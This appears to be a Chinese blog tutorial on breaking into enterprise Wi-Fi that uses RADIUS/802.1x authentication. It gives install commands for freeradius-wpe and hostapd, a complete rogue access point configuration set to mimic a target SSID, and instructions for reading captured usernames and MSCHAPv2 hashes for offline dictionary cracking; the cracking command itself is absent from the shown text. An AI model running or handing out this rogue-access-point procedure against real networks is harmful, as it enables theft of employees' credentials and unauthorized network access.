破解使用radius實現802.1x認證的企業無線網路
0x01前言概述
針對開放式(沒有密碼)無線網路的企業攻擊,我個人感覺比較經典的攻擊方式有2種,一種是eviltwin,一種是karma。karma應該是eviltwin攻擊手法的升級版,攻擊者只需要簡單的監聽客戶端發的ssid探測和響應包就可以實現中間人了,受害者很少會有察覺。而且坊間曾有一個錯誤的認識,認為隱藏的ssid是不受karma影響的。但是實際情況是,客戶端如果曾經連線過隱藏的ssid,也會廣播這些網路的探測包。儘管karma這種攻擊方式已經有10多年的歷史了,但是在MAC OSX,ubuntu,老版本的andorid系統上依然有效。win7的預設配置居然是防護karma攻擊的。
對加密的無線網路,針對個人網路,很多是使用wpa2-psk預共享金鑰的方法來限制訪問。而公司的無線網路有使用wpa2企業認證的,也有使用radius服務提供獨立的使用者名稱和密碼來實現802.1x標準認證的。
0x02 實現過程
我這裡是的攻擊是使用hostapd扮演一個無線訪問點,然後透過打補丁的freeraidus wpe來捕捉密碼hash,最後用asleep來離線破解密碼,來對抗相對安全的使用radius伺服器提供獨立的使用者名稱和密碼實現的802.1x認證的企業無線網路環境。
所需裝置:
TP-LINK TL-WN821N
Kali 1.1.0
首先安裝freeradius-wpe,既可以使用dpkg直接安裝freeradius-server-wpe_2.1.12-1_i386.deb,也可以透過原始碼編譯來安裝,透過deb包安裝方法的命令如下:
wget https://github.com/brad-anton/freeradius-wpe/raw/master/freeradius-server-wpe_2.1.12-1_i386.deb
dpkg --install freeradius-server-wpe_2.1.12-1_i386.deb
ldconfig
cd /usr/local/etc/raddb/certs
./bootstrap && ldconfig
透過原始碼安裝的步驟如下:
git clone https://github.com/brad-anton/freeradius-wpe.git
wget ftp://ftp.freeradius.org/pub/freeradius/freeradius-server-2.1.12.tar.bz2
tar jxvf freeradius-server-2.1.12.tar.bz2
patch -p1 < ../freeradius-wpe.patch
./configure
make install
然後執行radiusd -X開啟debug模式驗證是否安裝成功,如果執行此命令的時候提示
Failed binding to /usr/local/var/run/radiusd/radiusd.sock: No such file or directory
則需要建立相應的目錄
[email protected]:/usr/local/etc/raddb/certs# mkdir -p /usr/local/var/run/radiusd/
接下來安裝hostapd,命令如下:
wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar zxvf hostapd-2.0.tar.gz
cd hostapd-2.0/hostapd/
cp defconfig .config
make
如果安裝的時候提示:
../src/drivers/driver_nl80211.c:19:31: fatal error: netlink/genl/genl.h: No such file or directory
compilation terminated.
make: *** [../src/drivers/driver_nl80211.o] Error 1
則需要安裝libnl開發包,命令如下:
[email protected]:/hostapd-2.0/hostapd# sudo apt-get install libnl1 libnl-dev
然後編輯hostapd-wpe.conf檔案,如下
interface=wlan0
driver=nl80211
ssid=corp-lobby
country_code=DE
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=CCMP
rsn_pairwise=CCMP
實際操作需要修改的地方只有ssid項,如果你的目標企業無線網路的ssid叫corp-lobby,則修改ssid=corp-lobby,執行 hostapd -dd hostapd-wpe.conf 開啟偽造的無線熱點
這時候如果有企業員工在你附近,他的手機會自動連線你的偽造的無線熱點,你就可以透過
tail -f /usr/local/var/log/radius/freeradius-server-wpe.log
看到抓到的使用者名稱和MSCHAPv2的響應hash和挑戰hash。
有了challenge和response,就可以使用asleep工具來基於字典的暴力破解,命令如下
使用radius實現802.1x認證的企業無線網路相對來說還是比較安全的,如果每個使用者的密碼足夠複雜的話。後續的國外研究者也對這種攻擊增加了針對客戶端和路由裝置的心跳漏洞的工具,整合的專案叫cupid,有興趣的可以參考http://www.sysvalue.com/en/heartbleed-cupid-wireless/
0x03 參考文章
http://phreaklets.blogspot.sg/2013/06/cracking-wireless-networks-protected.html https://insights.sei.cmu.edu/cert/2015/08/instant-karma-might-still-get-you.html
相關文章
- 企業無線覆蓋,企業無線網路,辦公無線區域網方案
- Win8如何開啟802.1x網路身份認證
- 網際網路公司無線認證平臺好嗎
- 網際網路公司無線認證平臺哪裡有
- 高新企業認證工作網,選擇高新技術企業認證工作網要謹慎
- wifi無線認證WiFi
- 企業無線網路裝置的未來規劃
- 三分鐘破解無線網——無線網路安全攻防
- ASP.NET實現企業微信接入應用實現身份認證ASP.NET
- 無線認證請求過多造成WLC-Radius擁堵崩潰現象就及解決方法
- 企業無線網路安全應用解決方案
- 使用於企業級的無線網測試軟體
- 如何保證無線網路安全
- 企業WiFi認證 保護企業的資訊WiFi
- 企業WiFi認證,如何保證企業WiFi安全?WiFi
- RADIUS:遠端使用者撥號認證系統
- 辦公室實現無線網路全面覆蓋的方案
- 酒店如何實現上網認證的呢
- HD-OS無線網路卡透過whql認證
- 實現企業網路現代化的5個步驟
- 網路身份認證——Kerberos配置及認證ROS
- 飛書 + Lua 實現企業級組織架構登入認證架構
- kali無線破解實戰
- 幹掉傳統企業無線網狀網路新勢力來襲
- 2B企業如何實現網際網路化
- 15 分鐘實現企業級應用無損上下線
- 喜提中國通訊企業協會最高階別認證 | 網路安全領域AAA級信用企業
- HTTP使用BASIC認證的原理及實現方法HTTP
- 中萬網路實名網站認證形成背景網站
- Django框架中的使用者認證的實現Django框架
- 透過整合行業的光纖認證功能實現光纖認證智慧化行業
- 網際網路行業都在使用的企業郵箱行業
- 企業WiFi認證,怎麼確保企業WiFi安全?WiFi
- 實驗二 網路嗅探與身份認證
- 訪問使用者中心實現認證
- 使用JWT實現Spring Boot令牌認證JWTSpring Boot
- cisco裝置遠端telnet登入radius認證
- koa 實現 jwt 認證JWT